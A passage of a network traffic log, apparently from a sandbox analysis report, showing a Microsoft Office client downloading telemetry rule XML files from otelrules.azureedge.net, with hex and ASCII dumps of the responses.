                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            90192.168.2.54981213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:14 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:15 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:15 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                            x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073115Z-174f7845968kdththC1EWRzvxn0000000bz00000000057hz
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:15 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            91192.168.2.54981313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:16 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:16 UTC491INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:16 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 174
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                            x-ms-request-id: 41c1b425-301e-005d-48df-41e448000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073116Z-174f7845968n2hr8hC1EWR9cag0000000z5000000000c0ft
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:16 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            92192.168.2.54981413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:16 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:17 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:16 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1952
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                            x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073116Z-174f78459685726chC1EWRsnbg0000000zt0000000000bb2
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:17 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            93192.168.2.54981513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:16 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:17 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:17 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 958
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                            x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073117Z-174f7845968j6t2phC1EWRcfe80000000zv0000000001kaa
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:17 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            94192.168.2.54981613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:17 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:17 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:17 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 501
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                            x-ms-request-id: f418fe9b-801e-0047-5281-3f7265000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073117Z-174f7845968cpnpfhC1EWR3afc0000000z7g000000005f9q
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:17 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            95192.168.2.54981713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:17 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:17 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:17 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2592
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                            x-ms-request-id: e5837872-c01e-00a1-6f26-417e4a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073117Z-174f7845968j6t2phC1EWRcfe80000000ztg00000000419z
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:17 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            96192.168.2.54981813.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:18 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:18 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:18 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 3342
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                            x-ms-request-id: 13d8e9aa-301e-0020-7d2e-416299000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073118Z-174f784596886s2bhC1EWR743w0000000zmg0000000077xc
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:18 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            97192.168.2.54981913.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:18 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:19 UTC515INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 2284
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                            x-ms-request-id: fdaae0ed-201e-000c-15df-4179c4000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073119Z-174f7845968l4kp6hC1EWRe8840000000zzg0000000001rb
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:19 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            98192.168.2.54982013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:19 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:19 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1393
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                            x-ms-request-id: 75932801-b01e-00ab-324d-40dafd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073119Z-174f7845968pf68xhC1EWRr4h80000000zsg00000000an78
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:19 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            99192.168.2.54982113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:19 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:19 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1356
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                            x-ms-request-id: af2f76df-f01e-0096-4850-4110ef000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073119Z-174f7845968ljs8phC1EWRe6en0000000zh0000000001ztr
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:31:19 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            100192.168.2.54982213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:31:19 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:31:19 UTC494INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:19 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 1393
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                            x-ms-request-id: 2b15fac9-d01e-002b-104f-4125fb000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073119Z-174f78459684bddphC1EWRbht40000000zeg000000000g52
